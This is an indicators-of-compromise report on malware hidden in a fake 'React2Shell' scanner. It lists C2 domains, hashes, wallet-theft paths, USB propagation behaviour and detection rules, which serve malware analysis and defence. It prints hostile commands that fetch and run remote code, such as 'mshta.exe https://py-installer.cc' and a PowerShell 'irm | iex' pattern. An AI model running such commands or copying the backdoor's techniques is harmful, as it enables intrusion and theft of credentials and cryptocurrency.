IOCs.txt

================================================================================
INDICATORS OF COMPROMISE (IOCs)
React2Shell Scanner Malware Analysis
================================================================================

Date: December 9, 2025
SHA256: 915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
VirusTotal: https://www.virustotal.com/gui/file/915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03

================================================================================
1. NETWORK INDICATORS
================================================================================

1.1 Command & Control Infrastructure
------------------------------------
Domain: py-installer.cc
IPv4 Addresses:
  - 172.67.219.119
  - 104.21.53.225
IPv6 Addresses:
  - 2606:4700:3033::6815:35e1
  - 2606:4700:3034::ac43:db77
Protection: Cloudflare CDN
Certificate: Google Trust Services (expires Feb 21, 2026)

1.2 C2 Endpoints
----------------
https://py-installer.cc/
https://py-installer.cc/connect?hwid=
https://py-installer.cc/getModule?name=
https://py-installer.cc/getPsModule@
https://py-installer.cc/approveUpdate?id=
https://py-installer.cc/checkStatus

1.3 HTTP Headers
----------------
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0)
Content-Type: application/hta
Content-Disposition: attachment; filename=Python2.hta; filename*=UTF-8''Python2.hta
Authorization: Bearer <JWT_TOKEN>

1.4 HTTP Request Parameters
---------------------------
hwid=<hardware_id>
os=<operating_system>
av=<antivirus_products>
username=<username>
corp=<corporate_info>
domain=<domain_name>
version=<os_version>
key=<encryption_key>
ledger=<ledger_wallet_detection>
wallets=<other_wallet_detection>
task=<task_id>

1.5 HTTP Methods
----------------
POST (for C2 communication)
GET (for malware download)

================================================================================
2. FILE INDICATORS
================================================================================

2.1 Malware Files
-----------------
Filename: Python2.hta (downloaded name)
SHA256: 915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
MD5: 635dd3d016c76f5c0329d3fcfd3c2005
Size: 88,686 bytes
Type: HTML Application (HTA)
MalShare: https://malshare.com/sample.php?action=detail&hash=915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03

2.2 File Locations
------------------
%userprofile%\
%LOCALAPPDATA%\
%APPDATA%\
%ProgramFiles%\
%ProgramData%\
Removable drives (USB propagation)

2.3 File Extensions Targeted for Propagation
---------------------------------------------
.docx (Microsoft Word documents)
.pdf (PDF documents)
.doc (Legacy Word documents)

2.4 Malicious Shortcuts Created
--------------------------------
Extension: .lnk
Target: mshta.exe https://py-installer.cc
Location: Removable drives (USB)
Icon: Extracted from original file or system default

================================================================================
3. PROCESS INDICATORS
================================================================================

3.1 Process Execution Patterns
------------------------------
mshta.exe https://py-installer.cc
powershell.exe -ep Bypass -nop -Command "irm <URL> | iex"
bitsadmin.exe /transfer "<task>" /download /priority foreground "<URL>" "<path>"
certutil.exe -urlcache -split -f "<URL>" "<path>"
rundll32.exe "<dll_path>",<entry_point>
msiexec.exe /i "<path>" /quiet /qn

3.2 Process Names
----------------
mshta.exe
powershell.exe
bitsadmin.exe
certutil.exe
rundll32.exe
msiexec.exe

================================================================================
4. REGISTRY INDICATORS
================================================================================

4.1 Registry Keys Accessed
---------------------------
HKEY_CLASSES_ROOT\<extension>\DefaultIcon\
HKEY_CLASSES_ROOT\<extension>\

4.2 Registry Operations
------------------------
Read operations for file association icons
Read operations for extension handlers

================================================================================
5. SCHEDULED TASK INDICATORS
================================================================================

5.1 Task Naming Pattern
-----------------------
NVIDIA App SelfUpdate_<HWID>
Where <HWID> is a hardware identifier (UUID format)

5.2 Task Intervals
-----------------
PT30M (30 minutes)
PT10M (10 minutes)
P3650D (10 years)

5.3 Task Service
----------------
Schedule.Service (Windows Task Scheduler)

================================================================================
6. WMI QUERY INDICATORS
================================================================================

6.1 WMI Namespaces Queried
--------------------------
root\cimv2
root\SecurityCenter2
root\CIMV2
root\default

6.2 WMI Classes Queried
-----------------------
Win32_Processor
Win32_ComputerSystemProduct
Win32_DiskDrive
Win32_OperatingSystem
Win32_ComputerSystem
AntiVirusProduct
Win32_Process
Win32_LogicalDisk
Win32_DiskPartition

6.3 Specific WMI Queries
------------------------
SELECT ProcessorId FROM Win32_Processor
SELECT UUID FROM Win32_ComputerSystemProduct
SELECT SerialNumber FROM Win32_DiskDrive
SELECT Model FROM Win32_DiskDrive
SELECT Caption, Version, ProductType FROM Win32_OperatingSystem
SELECT displayName FROM AntiVirusProduct
SELECT PartOfDomain FROM Win32_ComputerSystem
SELECT Domain, PartOfDomain FROM Win32_ComputerSystem
SELECT Name FROM Win32_Process
SELECT DeviceID,Index,Model,MediaType,InterfaceType,PNPDeviceID FROM Win32_DiskDrive
SELECT DeviceID FROM Win32_DiskPartition WHERE DiskIndex=
SELECT DeviceID,DriveType FROM Win32_LogicalDisk WHERE DriveType=2

================================================================================
7. BEHAVIORAL INDICATORS
================================================================================

7.1 System Information Collection
-----------------------------------
- Hardware identifiers (ProcessorId, UUID, SerialNumber, Model)
- Operating system version and architecture
- Domain membership status
- Installed antivirus products
- Username and computer name
- Environment variables (PROCESSOR_ARCHITECTURE, PROCESSOR_ARCHITEW6432)

7.2 Cryptocurrency Wallet Detection
------------------------------------
Targeted wallet paths:
  %ProgramFiles%\Ledger Live
  %ProgramFiles(x86)%\Ledger Live
  %ProgramFiles%\Programs\ledger-live
  %APPDATA%\@trezor
  %APPDATA%\atomic
  %APPDATA%\Exodus
  %APPDATA%\Guarda
  %APPDATA%\KeepKey
  %APPDATA%\BitBox02

7.3 Sandbox Evasion Indicators
-------------------------------
Username checks for: AZURE-PC, Bruno
System account checks: SYSTEM, СИСТЕМА
Antivirus detection: Falcon, csfalconservice
Environment variable checks
Domain membership verification

7.4 USB Propagation Indicators
------------------------------
- Enumeration of removable drives (DriveType=2)
- Scanning for .docx, .pdf, .doc files
- Creation of .lnk shortcuts
- Setting hidden attributes on original files
- Shortcut target: mshta.exe with C2 URL

================================================================================
8. CODE INDICATORS
================================================================================

8.1 Obfuscation Characteristics
--------------------------------
XOR cipher with key: 112
Function name: _stateProxy
Array name: executeModule
String decryption pattern: String.fromCharCode(data[i] ^ key)

8.2 Key Strings (Decrypted)
----------------------------
py-installer.cc
connect?hwid=
getModule?name=
getPsModule@
approveUpdate?id=
NVIDIA App SelfUpdate_
Ledger Live
@trezor
atomic
Exodus
Guarda
KeepKey
BitBox02
WbemScripting.SWbemLocator
Schedule.Service
WinHttp.WinHttpRequest.5.1
MSXML2.XMLHTTP
ADODB.Stream

8.3 ActiveX Objects Used
------------------------
WScript.Shell
Scripting.FileSystemObject
WScript.Network
ActiveXObject
WinHttp.WinHttpRequest.5.1
MSXML2.XMLHTTP
ADODB.Stream
Shell.Application
Schedule.Service
WbemScripting.SWbemLocator
MSScriptControl.ScriptControl

================================================================================
9. SOURCE CODE INDICATORS (Backdoor in react2shell.py.py)
================================================================================

9.1 Function Name
-----------------
_initialize_runtime_environment()

9.2 Hex Encoded Strings
------------------------
6d73687461 → mshta
2e657865 → .exe
68747470733a2f2f → https://
70792d696e7374616c6c65722e6363 → py-installer.cc

9.3 Execution Command
----------------------
mshta.exe https://py-installer.cc

9.4 Source Repository
---------------------
https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py
Archive: https://web.archive.org/web/20251209081236/https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py

================================================================================
10. DETECTION RULES
================================================================================

Detection rules are available in the rules/ directory:

10.1 YARA RULES
---------------
- rules/react2shell_backdoor.yar - Detects React2Shell scanner backdoor in Python files
- rules/hta_malware_pyinstaller.yar - Detects HTA malware from py-installer.cc C2 server

Usage:
    yara rules/react2shell_backdoor.yar <file>
    yara rules/hta_malware_pyinstaller.yar <file>

10.2 SIGMA RULES
----------------
- rules/sigma_react2shell_backdoor.yml - Detects mshta.exe execution with py-installer.cc
- rules/sigma_react2shell_c2_network.yml - Detects network connections to C2 infrastructure
- rules/sigma_react2shell_c2_endpoints.yml - Detects HTTP requests to C2 endpoints
- rules/sigma_react2shell_scheduled_task.yml - Detects suspicious scheduled task creation
- rules/sigma_react2shell_python_backdoor.yml - Detects Python backdoor function execution
- rules/sigma_react2shell_wmi_persistence.yml - Detects WMI event subscription persistence

Usage:
    sigmac -t <siem_type> rules/sigma_react2shell_backdoor.yml
    # Supported SIEM types: splunk, elastic, qradar, arcsiem, etc.

================================================================================
12. SNORT/SURICATA RULES
================================================================================

alert http any any -> any any (msg:"React2Shell Malware C2 Communication"; 
    flow:established,to_server; 
    http.uri; 
    content:"py-installer.cc"; 
    content:"hwid="; 
    content:"Authorization"; 
    content:"Bearer"; 
    sid:1000001; 
    rev:1;)

alert http any any -> any any (msg:"React2Shell Malware Download"; 
    flow:established,to_server; 
    http.host; 
    content:"py-installer.cc"; 
    http.user_agent; 
    content:"MSIE 7.0"; 
    content:"Windows NT 10.0"; 
    sid:1000002; 
    rev:1;)

================================================================================
12. SIEM QUERIES
================================================================================

12.1 Splunk Query
-----------------
index=* (process_name="mshta.exe" AND command_line="*py-installer.cc*") 
OR (process_name="powershell.exe" AND command_line="*irm*py-installer.cc*")
OR (dns_query="py-installer.cc")
OR (http_url="*py-installer.cc*")

12.2 Elasticsearch Query
-------------------------
{
  "query": {
    "bool": {
      "should": [
        {"match": {"process.name": "mshta.exe"}},
        {"match": {"process.command_line": "py-installer.cc"}},
        {"match": {"dns.question.name": "py-installer.cc"}},
        {"match": {"url.domain": "py-installer.cc"}}
      ]
    }
  }
}

================================================================================
13. MITRE ATT&CK MAPPING
================================================================================

T1566.001 - Phishing: Spearphishing Attachment (Supply chain attack)
T1059.001 - Command and Scripting Interpreter: PowerShell
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
T1105 - Ingress Tool Transfer
T1071.001 - Application Layer Protocol: Web Protocols
T1083 - File and Directory Discovery
T1082 - System Information Discovery
T1012 - Query Registry
T1057 - Process Discovery
T1041 - Exfiltration Over C2 Channel
T1021.002 - Remote Services: SMB/Windows Admin Shares (USB propagation)
T1053.005 - Scheduled Task/Job: Scheduled Task
T1074.001 - Data Staged: Local Data Staging
T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion
T1497.001 - Virtualization/Sandbox Evasion: System Checks
T1560.001 - Archive Collected Data: Archive via Utility
T1574.002 - Hijack Execution Flow: DLL Side-Loading (rundll32)

================================================================================
14. RECOMMENDED BLOCKING ACTIONS
================================================================================

14.1 DNS Blocking
----------------
Block domain: py-installer.cc
Block IPs: 172.67.219.119, 104.21.53.225

14.2 Firewall Rules
-------------------
Block outbound connections to py-installer.cc
Block outbound connections to IPs: 172.67.219.119, 104.21.53.225

14.3 Process Blocking
---------------------
Alert on mshta.exe execution with remote URLs
Monitor for powershell.exe -ep Bypass
Alert on bitsadmin.exe /transfer to external domains
Monitor certutil.exe -urlcache usage

14.4 File System Monitoring
---------------------------
Alert on .lnk file creation on removable drives
Monitor for hidden file attribute changes
Alert on HTA file execution

================================================================================
END OF IOCs
================================================================================